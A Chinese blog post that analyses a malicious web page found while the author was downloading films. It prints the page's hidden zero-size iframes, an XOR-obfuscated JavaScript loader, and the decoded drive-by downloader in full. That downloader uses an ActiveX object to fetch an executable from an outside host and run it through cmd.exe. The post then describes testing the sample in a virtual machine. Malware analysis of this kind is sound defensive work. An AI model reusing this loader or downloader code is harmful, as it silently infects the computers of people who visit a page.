『原创』木马到底生在何处? – 记一次曲折的VBS网马查找之旅
弟弟元斌买了个新手机,昨天帮他下载MP4格式的电影。点进一个网页的时候,卡巴突然报了警,我便马上关闭了那个网页,后来也就没有理它,只记得vbs.downloader什么的。
今天本来想睡午觉了,不过突然想起了那个VBS网马,嗯,去看看是什么东西。打开卡巴,查看记录,找到了
“已检测到: 木马程序 Trojan-Downloader.VBS.Psyme.de URL: http://www.92mjj.cn/soft/tj.htm”
这一项。
如图:
到底是什么木马呢?我先把地址添加到迅雷里进行下载,下载下来后用记事本打开查看源代码如下:
<script src='http://s127.cnzz.com/stat.php?id=573862&web_id=573862&online=1' language='JavaScript' charset='gb2312'></script> <iframe src="http://www.92mjj.cn/soft/1.htm" width="0" height="0" </iframe> <iframe src="http://www.92mjj.cn/soft/2.htm" width="0" height="0" </iframe> <iframe src="http://www.92mjj.cn/soft/3.htm" width="0" height="0" </iframe>
呵呵,又是这一招!打开后是站长统计四个字的超级链接,而木马就隐藏在下面三行,长度宽度都设置为了0。我把
http://www.92mjj.cn/soft/1.htm、
http://www.92mjj.cn/soft/2.htm、
http://www.92mjj.cn/soft/3.htm
三个都放在迅雷中进行下载,结果第三个不能下载。
打开1.html,查看其源代码:
<script>
strHTML="";
strHTML+="%0C%5EVD%00E%5DF%17%5Ci8%0FZQKP%0B%00%14%10A%00Y%1F%0F%0F%1E%0C%05A%05";
strHTML+="%5DU%07%3Ai%0B%1BX%0C%11%07@ZCC%07%3ClYG%00A%0A%14A%11_P%0B%04F%05WU%1";
strHTML+="9%0AC%7DgU%11%0B%14F%0D%3E%3D_D%08%06@%0A%5C%0DDR_%1BC7%02t%21I%5Bl%06";
strHTML+="JLBW%11B+@%5B%01%0ANX%08%01%5B%14hA%29TE%5B%1388%11%16Q%5E%5DX%0E%15i%";
strHTML+="1EJH%16%60Rtr@Z3T%0F%11V%17%11G_%14O%11%0ECC%1B%17%17C%0EG%13K%17%10%1";
strHTML+="DIE%0E%3A3%3ClE%14C%13%07%08%15%0C%13%13%0D%17G%14%0A%1F%16@%14@%1A%0F";
strHTML+="Q%0F%0EX%1DPY%16B%09%03@L%5E%0EJPIV%13hi%08%12QB%19T%0B%5EXW%0E_%13%5B";
strHTML+="%5DWXNjD%01%5B%00F%0E%01%5BE%11l%3EAP%16UQMR%26%5BQ%5B%06%0C%10%10n%1B";
strHTML+="%15VS%0C%00W%17%11J_VYZ%5D%04%0EhFCUMv%17CF_%01%17%10W%11n%1F%1BR%0A%0";
strHTML+="4G%10Z%07F%19%13P%5D%16%0AW%5Ert%00%01%20%02%01%00NTQs%00%1E%06%08uVH%";
strHTML+="0D%5B%00%22I%05%01p%01Q%25pV%09u%0A%01A%1E%0F@%02%10DD%01%0ETQX%0A%04Y";
strHTML+="8%11%20%16PPGT*%01Y%01SD%1BjK%15y_%00%10%0BA%5CUC%17iDN%16.%11HFy%13%1";
strHTML+="8%13-A%18Fd%12%12%157%15%1F%143@H%10%11%1A%0COP%14EBP%0E%00%0C%5C%5DR%";
strHTML+="5C%3EAp%16UQMR%2CU%5ES%00%16Fo%1B%11v%5D%5E%02%07%1A0G%11%01T%5C%11%1D";
strHTML+="GA%1A_F%03b%15%17NDSA%3FY%03%08E%05b%13%09%15Q%0D%11%3EL%17vveGOEH%00%";
strHTML+="19%02AQl%16E%06%0C%00%10n%1B%1E%02f%0F%0BP%0CD%10YR_%1B%00US%03T%19%0B";
strHTML+="OV%11%17%5C%7E%05F6%04%0EP_P%5D%07%08oAp%11%01TEV%7E%07%09V%07D%12d%1F";
strHTML+="AdWD%0A%12%10%5B%5DT%19%7FX%0A%00g%1A@%17%01X%7EQ%5B%00%00GF%1C%12%1B%";
strHTML+="1EXAUDC4%03v%5DioqEQX%5C+UG6%03j%11v%00%17%60%14USPV%0Fq%5BZ%07%07%16%";
strHTML+="10n%1B%07%10%0A1%0CZ%07%5C%14%17%08Y%7BWA1%05%3F%12rL%5E%0FSdW%17%0AFo";
strHTML+="%1BeP%7D_%3C%3D%7C%17%04O3%5C_W%5E%12%10%1A_F%03b%15%2CGQXA%3FL%1B%08E";
strHTML+="%04b%131%17%5D%17VA9%1DG%01jG%11V%17@_WD%06u%5BR%1A@9%1B%08E%04b%135%0";
strHTML+="4B%06g%0C%22%5C%5DV%138Kd%0D%5ETV@%10%1B%06%1FX%14Wi%11p%5BVB%03GiK%1A";
strHTML+="X%12TC%13b%08%22P%15yG%7Ea%5B%0AW%5E%0A%0E%05_h%11tKT%07%11Q%2CQ%09%01";
strHTML+="VE%11lMA%60%0CU%5CU%19%22GDZ%0A%01%05FZ%5CY%1B%1DDG%1DXV%1B%14%04%0C%5";
strHTML+="By%03GaRk%12%7BB%0A%5BPf%02%16%0C%10n%1Ba%5Eu%08%3Fl+GTO%12moB%1C%10G%";
strHTML+="01%5D%03%0B%10O%10w%7B%27L%01JV%14%1E%02b%0B%24W%12z%14%23c%09h%136+V%";
strHTML+="08%5CuAr%00B%60SA%3FLWKC%06%15%16FJWC%14H3%5C_W%5E%12%10%1FF%12%1C%1BX";
strHTML+="%13RZ%14ORMOPRCZYN%0C%1D%18Z%5EUH%3C9%0DJ%10P%16Y@M%09n%3D%08E%00%10%0";
strHTML+="DBG%13C@A%03X%16%17V%1B%10%1A%7B%60R%17%0AC%10%12%0E_B%0DT@_%0C%0CD%5B";
strHTML+="%5DZC%11%18F%1E%14%07%5C%00%11XT%5DEK%14A%0DDU%11%15A%1E%0FK%14%0B%0AV";
strHTML+="%5CD%19V_%0A%0AU%07%13%5ED%5C_ZE%5E_%1C%17SBPG%17%099%3C_%00%0BVJ%13XW";
strHTML+="R%09%0B@%06K%17%09P_F%0CG%11V%10EBW%17%05VXE%06@D%5D%5D@RUT%05%11G%17R";
strHTML+="%11%10%08%13AT%11%16A%0A%10VX%5B%10R%16%16%0C%0C%00@RTDMP%14%11%09AA%0";
strHTML+="6%10@C%5D%11%03%02_%17U%12%07%3Ai%3A%3E";
function XOR(strV,strPass){
var intPassLength=strPass.length;
var re="";
for(var i=0;i<strV.length;i++){
re+=String.fromCharCode(strV.charCodeAt(i)^strPass.charCodeAt(i%intPassLength));
}
return(re);
}
var STR =
{
hexcase : 0, /* hex output format. 0 - lowercase; 1 - uppercase */
b64pad : "", /* base-64 pad character. "=" for strict RFC compliance */
chrsz : 8, /* bits per input character. 8 - ASCII; 16 - Unicode */
b64_hmac_md5:
function(key, data) { return binl2b64(core_hmac_md5(key, data)); },
b64_md5:
function(s){ return binl2b64(core_md5(str2binl(s), s.length * this.chrsz));},
binl2b64:
function(binarray){
var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var str = "";
for(var i = 0; i < binarray.length * 4; i += 3)
{
var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
| (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
| ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
for(var j = 0; j < 4; j++)
{
if(i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
}
}
return str;
},
binl2hex:
function(binarray){
var hex_tab = this.hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
var str = "";
for(var i = 0; i < binarray.length * 4; i++)
{
str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
}
return str;
},
binl2str:
function(bin){
var str = "";
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < bin.length * 32; i += this.chrsz)
str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
return str;
},
bit_rol:
function(num, cnt){return (num << cnt) | (num >>> (32 - cnt));},
core_hmac_md5:
function(key, data){
var bkey = str2binl(key);
if(bkey.length > 16) bkey = core_md5(bkey, key.length * this.chrsz);
var ipad = Array(16), opad = Array(16);
for(var i = 0; i < 16; i++)
{
ipad[i] = bkey[i] ^ 0x36363636;
opad[i] = bkey[i] ^ 0x5C5C5C5C;
}
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * this.chrsz);
return core_md5(opad.concat(hash), 512 + 128);
},
core_md5:
function(x, len){
/* append padding */
x[len >> 5] |= 0x80 << ((len) % 32);
x[(((len + 64) >>> 9) << 4) + 14] = len;
var a = 1732584193;
var b = -271733879;
var c = -1732584194;
var d = 271733878;
for(var i = 0; i < x.length; i += 16)
{
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;
a = this.md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
d = this.md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
c = this.md5_ff(c, d, a, b, x[i+ 2], 17, 606105819);
b = this.md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
a = this.md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
d = this.md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426);
c = this.md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
b = this.md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
a = this.md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
d = this.md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
c = this.md5_ff(c, d, a, b, x[i+10], 17, -42063);
b = this.md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
a = this.md5_ff(a, b, c, d, x[i+12], 7 , 1804603682);
d = this.md5_ff(d, a, b, c, x[i+13], 12, -40341101);
c = this.md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
b = this.md5_ff(b, c, d, a, x[i+15], 22, 1236535329);
a = this.md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
d = this.md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
c = this.md5_gg(c, d, a, b, x[i+11], 14, 643717713);
b = this.md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
a = this.md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
d = this.md5_gg(d, a, b, c, x[i+10], 9 , 38016083);
c = this.md5_gg(c, d, a, b, x[i+15], 14, -660478335);
b = this.md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
a = this.md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438);
d = this.md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
c = this.md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
b = this.md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501);
a = this.md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
d = this.md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
c = this.md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473);
b = this.md5_gg(b, c, d, a, x[i+12], 20, -1926607734);
a = this.md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
d = this.md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
c = this.md5_hh(c, d, a, b, x[i+11], 16, 1839030562);
b = this.md5_hh(b, c, d, a, x[i+14], 23, -35309556);
a = this.md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
d = this.md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353);
c = this.md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
b = this.md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
a = this.md5_hh(a, b, c, d, x[i+13], 4 , 681279174);
d = this.md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
c = this.md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
b = this.md5_hh(b, c, d, a, x[i+ 6], 23, 76029189);
a = this.md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
d = this.md5_hh(d, a, b, c, x[i+12], 11, -421815835);
c = this.md5_hh(c, d, a, b, x[i+15], 16, 530742520);
b = this.md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);
a = this.md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
d = this.md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415);
c = this.md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
b = this.md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
a = this.md5_ii(a, b, c, d, x[i+12], 6 , 1700485571);
d = this.md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
c = this.md5_ii(c, d, a, b, x[i+10], 15, -1051523);
b = this.md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
a = this.md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
d = this.md5_ii(d, a, b, c, x[i+15], 10, -30611744);
c = this.md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
b = this.md5_ii(b, c, d, a, x[i+13], 21, 1309151649);
a = this.md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
d = this.md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
c = this.md5_ii(c, d, a, b, x[i+ 2], 15, 718787259);
b = this.md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);
a = this.safe_add(a, olda);
b = this.safe_add(b, oldb);
c = this.safe_add(c, oldc);
d = this.safe_add(d, oldd);
}
return Array(a, b, c, d);
},
hex_hmac_md5:function(key, data){ return this.binl2hex(this.core_hmac_md5(key, data)); },
hex_md5:function(s){return this.binl2hex(this.core_md5(this.str2binl(s), s.length * this.chrsz));},
md5:function(s){return(this.hex_md5(s));},
md5_cmn:function(q, a, b, x, s, t){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a, q), this.safe_add(x, t)), s),b);},
md5_ff:function(a, b, c, d, x, s, t){return this.md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);},
md5_gg:function(a, b, c, d, x, s, t){return this.md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);},
md5_hh:function(a, b, c, d, x, s, t){return this.md5_cmn(b ^ c ^ d, a, b, x, s, t);},
md5_ii:function(a, b, c, d, x, s, t){return this.md5_cmn(c ^ (b | (~d)), a, b, x, s, t);},
md5_vm_test:function(){return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";},
safe_add:
function(x, y){
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
},
str2binl:
function(str){
var bin = Array();
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < str.length * this.chrsz; i += this.chrsz)
bin[i>>5] |= (str.charCodeAt(i / this.chrsz) & mask) << (i%32);
return bin;
},
str_hmac_md5:function(key, data){ return binl2str(core_hmac_md5(key, data)); },
str_md5:function(s){ return binl2str(core_md5(str2binl(s), s.length * this.chrsz));}
}
function performPage(strPass){
if(strPass){
document.cookie="password="+escape(strPass);
document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH";
if(pass){
pass=unescape(pass);
document.write(XOR(unescape(strHTML),STR.md5(pass)));
return(false);
}
}
performPage();
</script>
我以为真正的木马地址会直接显现出来。可正如上所看到的,网马被加了密。用卡巴试着查杀, 卡巴没有检测到危险。密密麻麻这么多的代码,还真得花些时间分析一下。不过学技术嘛,我可不能偷懒~~
strHTML后面的是被加密后的代码字符串,用的是微软的escape的加密法;function XOR(strV,strPass)这个过程应该是用来解密加密后的代码的,还设置了密码strpass。主要来看最后一个过程调用,这个过程要仔细分析了,我加了自己的注释:
function performPage(strPass){
if(strPass){
document.cookie="password="+escape(strPass); //把用escape加密后的strpass写入cookie,用来判断是否已经被执行过。
document.write(XOR(unescape(strHTML),STR.md5(strPass))); //将最上面的strHTML解密后执行。
return(false); //判断strPass是否存在,存在则执行下面两语句。
}
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH"; //用escape加密后的密码。
if(pass){
pass=unescape(pass); //这一句就是用unescape函数进行解密。
document.write(XOR(unescape(strHTML),STR.md5(pass))); //将上面的strHTML用XOR函数解密后执行。
return(false);
}
}
performPage(); //最后就是执行performPage()了。
我们先来看看密码是什么,用在线工具解密一下就可以了。“MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH”解密后就是“MU JJ A MU AIIIAIFHHH”。也可以不用工具,进行直接解密。我们把performPage(strPass)这个过程改动一下,让它直接输出密码明文来。将它改成:
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass))); //把这行注释掉。
document.write(pass); //让它直接在浏览器上输出密码明文来。
return(false);
}
}
performPage();
最后就要来查看它的木马代码了。用上述方法让它把木马代码直接用明文显示出来。修改成:
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="MU%20JJ%20A%20%20MU%20%20AIIIAIFHHH";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
//document.write(pass);
document.getElementById( "muma" ).value = XOR(unescape(strHTML),STR.md5(pass));
return(false);
}
}
//performPage();
</script>
<textarea id="muma" name="muma" rows="10" cols="50"></textarea>
<script language=javascript>performPage();
将它保存为11.htm后打开,就可以在浏览器上查看到它木马的源代码了。如图:
看到了吗?http://www.92mjj.cn/soft/mm.exe,这就是木马的地址!!
我把源代码复制过来:
<noscript>
<iframe src=*></iframe>
</noscript>
<script language = JScript>
function gn(rRaGEykU1){var orh2=window["Math"]["random"]()*rRaGEykU1;return'~tmp'+'.tmp'}try{v=
dl = "http://www.92mjj.cn/soft/mm.exe"
;var chilam=window["document"]["createElement"]("object");chilam["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var v2=chilam["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var v3=chilam["CreateObject"]("Adodb.Stream","");v3["type"]=1;v2["open"]("GET",v,0);v2["send"]();Windows=gn(10000);var hHf$R6=chilam["CreateObject"]("Scripting.FileSystemObject","");var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0);Windows=hHf$R6["BuildPath"](VgDnZXHt7,Windows);v3["Open"]();v3["Write"](v2["responseBody"]);v3["SaveToFile"](Windows,2);v3["Close"]();var SmAcqIwGV8=chilam["CreateObject"]("Shell.Application","");exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','CMD.exe');SmAcqIwGV8["SHellExEcuTe"](exp1,' /c '+Windows,"","open",0)}catch(i){i=1}
</script>
<script type="text/JScript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
到这里还没有结束呢,我们把木马下载下来研究一下吧~
先用卡巴杀一下,卡巴不杀。打开我的虚拟机,把木马样本拖进去。打开Regsnap来进行快照对照。Regsnap大家都知道的吧,一款有名的注册表监视工具,具体用法就不再累述了。结果双击木马文件时运行出错了。晕哦,木马作者怎么在搞的呀?凭我的第一感觉应该是做免杀时出差错了。不过我还是看了下监视的的结果,它修改了很多处注册表项,最明显的是把windows附件里游戏啊、远程桌面连接什么的给删除了,郁闷中~~
好了,VBS网马的地址终于查找出来了。最大的收获就是要学会耐心、仔细地分析问题,希望此次查找网马之旅能对大家有所帮助。
看看还有没有您感兴趣的:
你好厉害喔。向你学习了。订阅你的博客才行。哈。
[回复]
呵呵,没有了,我也一直都在学习,希望能和你们多多交流。
[回复]